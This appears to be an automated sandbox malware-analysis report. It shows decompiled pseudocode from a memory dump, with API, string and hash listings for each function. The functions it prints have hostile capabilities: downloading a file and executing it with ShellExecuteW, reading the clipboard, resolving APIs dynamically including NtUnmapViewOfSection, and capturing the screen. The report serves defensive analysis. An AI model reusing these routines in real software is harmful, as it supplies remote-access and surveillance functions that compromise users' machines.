											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								__eflags = _v32 ^ _t132;
								return E0076FD1B(_v32 ^ _t132);
							} else {
								_t68 = E007823BA(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t20 = _t121 + 0x80; // 0x77e348
									_t92 = _t20;
									_t21 = _t121 + 0x120; // 0x77e3e8
									if(E007823BA(_t100, _t127, _t154, _t21, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E00790FF7(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											_t22 = _t121 + 0x120; // 0x77e3e8
											if(E007823BA(_t112, _t127, _t157, _t22, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E00790FF7(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												_t23 = _t121 + 0x100; // 0x77e3c8
												E0077BB3C(_t112, _t127, _t23, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

0x00789f58
0x00789f5d
0x00789f5e
0x00789f5f
0x00789f60
0x00789f61
0x00789f62
0x00789f67
0x00789f6a
0x00789f6c
0x00789f6f
0x00789f6f
0x00789f72
0x00789f72
0x00789f78
0x00789f7b
0x00789f7e
0x00789f7e
0x00789f81
0x00789f84
0x00789f8a
0x00789f8c
0x00789f91
0x00789f9b
0x00789fa0
0x00789fa3
0x00789fa3
0x00789fa7
0x00789fab
0x00789ff4
0x00000000
0x00789fad
0x00789fb2
0x00789fbb
0x00789fb4
0x00789fb4
0x00789fb4
0x00789fc2
0x00789fc6
0x00789fd0
0x00789fd5
0x00789fda
0x00789fe0
0x00789fe4
0x00789fed
0x00789fe6
0x00789fe6
0x00789fe6
0x00789ff9
0x00789ff9
0x00789ff9
0x00789fda
0x00789fc6
0x00789fff
0x0078a111
0x0078a111
0x0078a111
0x00000000
0x0078a005
0x0078a012
0x0078a018
0x00000000
0x0078a048
0x0078a048
0x0078a04d
0x0078a04f
0x0078a04f
0x0078a051
0x0078a056
0x0078a10c
0x0078a10e
0x00000000
0x0078a05c
0x0078a05c
0x0078a05f
0x0078a05f
0x0078a067
0x0078a06a
0x0078a06d
0x0078a06d
0x0078a070
0x0078a073
0x0078a07b
0x0078a080
0x0078a087
0x0078a08c
0x0078a08f
0x0078a091
0x0078a11c
0x0078a11d
0x0078a11e
0x0078a11f
0x0078a120
0x0078a121
0x0078a126
0x0078a12a
0x0078a132
0x0078a139
0x0078a13c
0x0078a13d
0x0078a141
0x0078a147
0x0078a14f
0x0078a15e
0x0078a16a
0x0078a17b
0x0078a181
0x0078a183
0x0078a194
0x0078a19b
0x0078a19d
0x0078a1a0
0x0078a1a6
0x0078a1a8
0x0078a1aa
0x0078a1aa
0x0078a1ad
0x0078a1b0
0x0078a1b0
0x0078a1a8
0x0078a1ba
0x0078a185
0x0078a185
0x0078a187
0x0078a1c2
0x0078a1cd
0x0078a097
0x0078a0a0
0x0078a0a5
0x0078a0a7
0x00000000
0x0078a0a9
0x0078a0ab
0x0078a0ab
0x0078a0b7
0x0078a0c5
0x00000000
0x0078a0c7
0x0078a0c7
0x0078a0ca
0x0078a0d0
0x0078a0d3
0x0078a0e3
0x0078a0e8
0x0078a0f6
0x00000000
0x00000000
0x00000000
0x00000000
0x0078a0d5
0x0078a0d5
0x0078a0d8
0x0078a0de
0x0078a0df
0x0078a0e1
0x0078a0f8
0x0078a0fc
0x0078a104
0x00000000
0x00000000
0x00000000
0x00000000
0x0078a0e1
0x0078a0d3
0x0078a0c5
0x0078a113
0x0078a119
0x0078a119
0x0078a091
0x0078a056
0x0078a018

APIs

Part of subcall function 00781CE2: GetLastError.KERNEL32(00000000,?,00775545,?,?,?,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781CE6
Part of subcall function 00781CE2: _free.LIBCMT ref: 00781D19
Part of subcall function 00781CE2: SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D5A
Part of subcall function 00781CE2: _abort.LIBCMT ref: 00781D60

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0077E2C8,?,?,?,?,0077DD1F,?,00000004), ref: 0078A03A
_wcschr.LIBVCRUNTIME ref: 0078A0CA
_wcschr.LIBVCRUNTIME ref: 0078A0D8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0077E2C8,00000000,0077E3E8), ref: 0078A17B

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 83d938ad725cb63a3d5d4c7bacea7bc90b82ebfd9bb2f685f9f57292568e3aca
Instruction ID: 2388c68be71d553a25f9b771656ebcc5ee3e6a24f6fe558f0070ed19411c03b1
Opcode Fuzzy Hash: 83d938ad725cb63a3d5d4c7bacea7bc90b82ebfd9bb2f685f9f57292568e3aca
Instruction Fuzzy Hash: 6661DB71680606FAEB25BB74DC4AABAB3ACEF04710F14442AFA05D7581FB7CE941C761

Uniqueness

Uniqueness Score: -1.00%

Function 00745C8B, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00745C8B(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v28;
				char _v44;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				void* _v104;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t33;
				void* _t50;
				signed char _t54;
				intOrPtr* _t57;
				void* _t59;
				void* _t63;
				void* _t70;
				void* _t72;
				void* _t77;
				intOrPtr* _t79;
				void* _t81;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t88;
				void* _t106;
				void* _t120;
				void* _t144;
				void* _t148;
				signed int _t155;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t162;
				void* _t166;
				void* _t167;

				_t167 = __eflags;
				_t140 = __edx;
				_t33 = E00741F95( &_a8);
				_push(0xffffffff);
				_t88 = 4;
				_push(_t88);
				_push( &_v28);
				E007442A6( &_a8);
				_t158 = (_t155 & 0xfffffff8) - 0x2c;
				E007420EC(_t88, _t158, __edx, _t167, 0x7ac238);
				_t159 = _t158 - 0x18;
				E007420EC(_t88, _t159, __edx, _t167,  &_v44);
				E00757478( &_v84, _t140);
				_t160 = _t159 + 0x30;
				_t148 =  *_t33 - _t88;
				if(_t148 == 0) {
					_t144 = 0;
					E00741E49( &_v64, _t140, __eflags, 0);
					_t141 = "F";
					__eflags = E00745A6F("F");
					if(__eflags == 0) {
						E00741E49( &_v68, "F", __eflags, 0);
						_t140 = "M";
						__eflags = E00745A6F("M");
						if(__eflags == 0) {
							L23:
							E00741E74( &_v64, _t140);
							E00741FC7();
							E00741FC7();
							return 0;
						}
						_v68 = 0;
						_t50 = E00741F95(E00741E49( &_v64, "M", __eflags, _t88));
						_t140 =  &_v76;
						__eflags = E00757111(_t50,  &_v76,  &_v68);
						if(__eflags == 0) {
							_t106 = _t160 - 0x18;
							_push("2");
							L22:
							E00742084(_t88, _t106);
							_push(0xb3);
							E00744AA4(_t88, _a4, _t140, __eflags);
							goto L23;
						}
						_t140 = _v72;
						_t54 = E0075432B(0x7abb08);
						L007794F1(_v72);
						_t162 = _t160 - 0x18;
						__eflags = (_t54 & 0x000000ff) - 1;
						L9:
						_t106 = _t162;
						if(__eflags != 0) {
							_push("3");
						} else {
							_push("1");
						}
						goto L22;
					}
					_t57 = E00741F95(E00741E49( &_v68, "F", __eflags, 2));
					_t59 = E00741F95(E00741E49( &_v68, _t141, __eflags, 3));
					_t140 =  *_t57;
					E0075805B( &_v60,  *_t57, _t59);
					_t63 = E00741F95(E00741E49( &_v72,  *_t57, __eflags, _t88));
					__imp__URLDownloadToFileW(0, _t63, E00741EEB( &_v60), 0, 0);
					__eflags = _t63;
					if(__eflags == 0) {
						L4:
						if( *((char*)(E00741F95(E00741E49( &_v84, _t140, _t171, 1)))) == 0) {
							_t120 = _t160 - 0x18;
							_push("0");
						} else {
							_t70 = ShellExecuteW(_t144, L"open", E00741EEB( &_v72), _t144, _t144, 1);
							_t120 = _t160 - 0x18;
							_t173 = _t70 - 0x20;
							if(_t70 > 0x20) {
								_push("1");
							} else {
								_push("3");
							}
						}
						L17:
						E00742084(_t88, _t120);
						_push(0xb3);
						E00744AA4(_t88, _a4, _t140, _t173);
						E00741EF0();
						goto L23;
					}
					L14:
					_t120 = _t160 - 0x18;
					_push("2");
					goto L17;
				}
				_t169 = _t148 != 1;
				if(_t148 != 1) {
					goto L23;
				}
				_t144 = 0;
				E00741E49( &_v64, _t140, _t169, 0);
				_t142 = "F";
				_t72 = E00745A6F("F");
				_t170 = _t72;
				if(_t72 == 0) {
					E00741E49( &_v68, "F", __eflags, 0);
					_t140 = "M";
					__eflags = E00745A6F("M");
					if(__eflags == 0) {
						goto L23;
					} else {
						_t140 = E00741F95(E00741E49( &_v64, "M", __eflags, _t88));
						_t77 = E0075432B(0x7abb08);
						_t162 = _t160 - 0x18;
						__eflags = _t77 - 1;
						goto L9;
					}
				}
				_t79 = E00741F95(E00741E49( &_v68, "F", _t170, 2));
				_t81 = E00741F95(E00741E49( &_v68, _t142, _t170, 3));
				_t140 =  *_t79;
				E0075805B( &_v60,  *_t79, _t81);
				_t83 = E00741EEB( &_v60);
				_t84 = E00741E49( &_v72,  *_t79, _t170, _t88);
				_t166 = _t160 - 0x18;
				E007420EC(_t88, _t166, _t140, _t170, _t84);
				_t86 = E00757A4E(_t83);
				_t160 = _t166 + 0x18;
				_t171 = _t86 - 1;
				if(_t86 != 1) {
					goto L14;
				}
				goto L4;
			}

0x00745c8b
0x00745c8b
0x00745c9a
0x00745c9f
0x00745ca3
0x00745ca9
0x00745cae
0x00745caf
0x00745cb4
0x00745cbe
0x00745cc3
0x00745ccd
0x00745cd6
0x00745cdb
0x00745cde
0x00745ce0
0x00745e15
0x00745e1c
0x00745e21
0x00745e31
0x00745e33
0x00745ed3
0x00745ed8
0x00745ee4
0x00745ee6
0x00745f54
0x00745f58
0x00745f61
0x00745f69
0x00745f76
0x00745f76
0x00745eec
0x00745efd
0x00745f02
0x00745f0e
0x00745f10
0x00745f3b
0x00745f3d
0x00745f42
0x00745f42
0x00745f4a
0x00745f4f
0x00000000
0x00745f4f
0x00745f12
0x00745f1b
0x00745f27
0x00745f2d
0x00745f30
0x00745dfd
0x00745dfd
0x00745dff
0x00745e0b
0x00745e01
0x00745e01
0x00745e01
0x00000000
0x00745dff
0x00745e42
0x00745e56
0x00745e5b
0x00745e62
0x00745e80
0x00745e87
0x00745e8d
0x00745e8f
0x00745d74
0x00745d89
0x00745eab
0x00745ead
0x00745d8f
0x00745da3
0x00745dac
0x00745dae
0x00745db1
0x00745ea1
0x00745db7
0x00745db7
0x00745db7
0x00745db1
0x00745eb2
0x00745eb2
0x00745eba
0x00745ebf
0x00745ec8
0x00000000
0x00745ec8
0x00745e95
0x00745e98
0x00745e9a
0x00000000
0x00745e9a
0x00745ce6
0x00745ce9
0x00000000
0x00000000
0x00745cef
0x00745cf6
0x00745cfb
0x00745d02
0x00745d0b
0x00745d0d
0x00745dc2
0x00745dc7
0x00745dd3
0x00745dd5
0x00000000
0x00745ddb
0x00745dec
0x00745df3
0x00745df8
0x00745dfb
0x00000000
0x00745dfb
0x00745dd5
0x00745d1c
0x00745d30
0x00745d35
0x00745d3c
0x00745d46
0x00745d52
0x00745d57
0x00745d5d
0x00745d64
0x00745d69
0x00745d6c
0x00745d6e
0x00000000
0x00000000
0x00000000

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00745DA3
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00745E87

Strings

open, xrefs: 00745D9D

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: open
API String ID: 2825088817-2758837156
Opcode ID: 7bdac947a3f6a8f115a64497b3f5879001f1d41ee875384c12e984e77753eadf
Instruction ID: 1ddffe4f200b040bcd6007a9e973db3f6eff9ab60edf4e9835875e9c9d558d4d
Opcode Fuzzy Hash: 7bdac947a3f6a8f115a64497b3f5879001f1d41ee875384c12e984e77753eadf
Instruction Fuzzy Hash: F761A272A04310E7CB14FAB5985F97E77A95F96300F80092DF946AB1D3EF2C9A49C252

Uniqueness

Uniqueness Score: -1.00%

Function 00749BD9, Relevance: 4.5, APIs: 3, Instructions: 22
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00749BD9(intOrPtr _a4) {
				void* _t8;
				void* _t10;

				if(OpenClipboard(0) == 0) {
					L3:
					_push(0x79f724);
				} else {
					_t10 = GetClipboardData(0xd);
					CloseClipboard();
					if(_t10 == 0) {
						goto L3;
					} else {
						_push(_t10);
					}
				}
				E0074427F(_t8, _a4);
				return _a4;
			}

0x00749be7
0x00749c00
0x00749c00
0x00749be9
0x00749bf1
0x00749bf3
0x00749bfb
0x00000000
0x00749bfd
0x00749bfd
0x00749bfd
0x00749bfb
0x00749c08
0x00749c12

APIs

OpenClipboard.USER32(00000000), ref: 00749BDF
GetClipboardData.USER32 ref: 00749BEB
CloseClipboard.USER32(?,00749C74,007492D9,?,00000000,00000000), ref: 00749BF3

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: 79d2a38c74b0cc9cd930a7ba820863f8f7c360cf991b59eb5d0495f637922266
Instruction ID: ddf9d8eac0a6848b00180d2ee301819ed16ff15e2f2c7b786f5ece619e14c4c3
Opcode Fuzzy Hash: 79d2a38c74b0cc9cd930a7ba820863f8f7c360cf991b59eb5d0495f637922266
Instruction Fuzzy Hash: 1CE08635284214EBC610ABF1EC49B9A7B98BB01B91F054022FA09DA150DB689900C6B4

Uniqueness

Uniqueness Score: -1.00%

Function 0074CD09, Relevance: 82.3, APIs: 28, Strings: 19, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0074CD09() {
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t2 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExA");
				 *0x7abd2c = _t2;
				if(_t2 == 0) {
					 *0x7abd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x7abd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x7abd2c == 0) {
					 *0x7abd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x7abd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x7abd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x7abeac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x7abeb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x7abd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
				 *0x7abd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x7abd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x7abd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x7abd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x7abb04 = _t24;
				return _t24;
			}

0x0074cd25
0x0074cd2d
0x0074cd34
0x0074cd45
0x0074cd45
0x0074cd60
0x0074cd65
0x0074cd76
0x0074cd76
0x0074cd94
0x0074cda8
0x0074cdbc
0x0074cdd0
0x0074cde4
0x0074cdf8
0x0074ce0c
0x0074ce20
0x0074ce31
0x0074ce39
0x0074ce3d
0x0074ce43

APIs

LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00000000,007AC548,00000001,0074C505), ref: 0074CD1C
GetProcAddress.KERNEL32(00000000), ref: 0074CD25
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0074CD40
GetProcAddress.KERNEL32(00000000), ref: 0074CD43
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0074CD54
GetProcAddress.KERNEL32(00000000), ref: 0074CD57
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0074CD71
GetProcAddress.KERNEL32(00000000), ref: 0074CD74
LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0074CD85
GetProcAddress.KERNEL32(00000000), ref: 0074CD88
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0074CD99
GetProcAddress.KERNEL32(00000000), ref: 0074CD9C
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0074CDAD
GetProcAddress.KERNEL32(00000000), ref: 0074CDB0
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0074CDC1
GetProcAddress.KERNEL32(00000000), ref: 0074CDC4
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0074CDD5
GetProcAddress.KERNEL32(00000000), ref: 0074CDD8
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0074CDE9
GetProcAddress.KERNEL32(00000000), ref: 0074CDEC
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0074CDFD
GetProcAddress.KERNEL32(00000000), ref: 0074CE00
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0074CE11
GetProcAddress.KERNEL32(00000000), ref: 0074CE14
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0074CE25
GetProcAddress.KERNEL32(00000000), ref: 0074CE28
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0074CE36
GetProcAddress.KERNEL32(00000000), ref: 0074CE39

Strings

NtUnmapViewOfSection, xrefs: 0074CD7B
GetMonitorInfoW, xrefs: 0074CE16
GetComputerNameExW, xrefs: 0074CDB2
kernel32, xrefs: 0074CDA3, 0074CDB7, 0074CDDF
Kernel32.dll, xrefs: 0074CD3B, 0074CD6C
GetModuleFileNameExW, xrefs: 0074CD4A, 0074CD67
IsWow64Process, xrefs: 0074CD9E
EnumDisplayDevicesW, xrefs: 0074CDEE
Shlwapi.dll, xrefs: 0074CE2C
kernel32.dll, xrefs: 0074CD8F
EnumDisplayMonitors, xrefs: 0074CE02
GetModuleFileNameExA, xrefs: 0074CD12, 0074CD36
Shell32, xrefs: 0074CDCB
user32, xrefs: 0074CDF3, 0074CE07, 0074CE1B
Psapi.dll, xrefs: 0074CD17, 0074CD4F
IsUserAnAdmin, xrefs: 0074CDC6
GlobalMemoryStatusEx, xrefs: 0074CD8A
SetProcessDEPPolicy, xrefs: 0074CDDA
ntdll.dll, xrefs: 0074CD80

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
API String ID: 551388010-3474354060
Opcode ID: c618c1af83d185922aacd323b025f50da08fdcb7e7759af197a2c0b6990814ad
Instruction ID: 5dcf3ab44421122cb02e41b72807662552b045c3730b1013e0f85436dc05fc22
Opcode Fuzzy Hash: c618c1af83d185922aacd323b025f50da08fdcb7e7759af197a2c0b6990814ad
Instruction Fuzzy Hash: 3721BFE0F8139879C6107BB26C4ED1B2E98EACBB55B008E16B10497191EBBC8510CEE9

Uniqueness

Uniqueness Score: -1.00%

Function 00754906, Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 298
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00754906(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = E00754D3D( *((intOrPtr*)(0x7abd78 + _a4 * 4)));
				_t114 = E00754D89( *((intOrPtr*)(0x7abd78 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							E00754DCA( *((intOrPtr*)(0x7abd78 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E007420D5(_t194,  &_v80);
												E007420D5(_t194,  &_v168);
												E0074251D(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E00743436( &_v80);
												E0074251D(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E00743436( &_v80);
												_t235 = _a4;
												E0074251D(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E00743436( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E00742044(_t194, _t194, __eflags,  &_v168);
												E00741FC7();
												E00741FC7();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E00742084(_t194, _t194, 0x79f6bc);
					L32:
					return _t194;
				}
			}

0x00754914
0x0075491f
0x00754927
0x0075492a
0x00754936
0x00754938
0x00754947
0x00754954
0x00754959
0x0075495c
0x00754961
0x0075497b
0x00754981
0x00754984
0x00754986
0x007549a0
0x007549a6
0x007549a8
0x007549c1
0x007549c5
0x007549d0
0x007549f0
0x007549f6
0x007549f8
0x00000000
0x00000000
0x007549fa
0x007549fe
0x00754a03
0x00754a0b
0x00754a11
0x00754a13
0x00754a1f
0x00754a25
0x00754a27
0x00754a41
0x00754a41
0x00754a44
0x00754a4d
0x00754a58
0x00754a5c
0x00754a62
0x00754a62
0x00754a27
0x00754a13
0x00754a68
0x00754a6b
0x00754a70
0x00754a76
0x00754a78
0x00000000
0x00754a7e
0x00754a85
0x00754a8b
0x00754a8e
0x00754a94
0x00754a96
0x00754a97
0x00754a9a
0x00754a9d
0x00754aca
0x00754aca
0x00754ad3
0x00754ad4
0x00754adc
0x00754ae0
0x00754ae1
0x00754aea
0x00754af0
0x00754af7
0x00754aff
0x00754b03
0x00754b06
0x00754b09
0x00754b10
0x00754b12
0x00754b12
0x00754b1e
0x00754b22
0x00754b26
0x00754b27
0x00754b35
0x00754b3c
0x00754b3f
0x00754b45
0x00754b48
0x00754b4a
0x00754b63
0x00754b69
0x00754b6b
0x00754b98
0x00754bac
0x00754bb1
0x00754bbc
0x00754bbc
0x00754bc2
0x00754bc5
0x00754bd0
0x00754bde
0x00754bed
0x00754bf8
0x00754c07
0x00754c0f
0x00754c16
0x00754c25
0x00754c2d
0x00754c34
0x00754c43
0x00754c46
0x00754c51
0x00754c5c
0x00754c64
0x00000000
0x00754c64
0x00754b76
0x00754b79
0x00754b7e
0x00754b88
0x00000000
0x00754b4c
0x00754b4c
0x007549ab
0x007549b1
0x007549b4
0x007549b6
0x00000000
0x007549b6
0x00754b4a
0x00754a9f
0x00754aa1
0x00754aa2
0x00754aa5
0x00754aa8
0x00000000
0x00000000
0x00754aaa
0x00754aac
0x00754aad
0x00754ab0
0x00754ab3
0x00000000
0x00000000
0x00754ab7
0x00754ab8
0x00754abb
0x00754ac4
0x00754ac6
0x00754ac7
0x00754ac7
0x00000000
0x00754ac7
0x00754abd
0x00754ac0
0x00000000
0x00754ac0
0x00000000
0x00754a90
0x00754a78
0x007549aa
0x007549aa
0x00000000
0x00754988
0x0075498f
0x00754992
0x00754994
0x00754996
0x00754996
0x00000000
0x00754996
0x00754967
0x00754967
0x0075496e
0x00754c6b
0x00754c71
0x00754c71

APIs

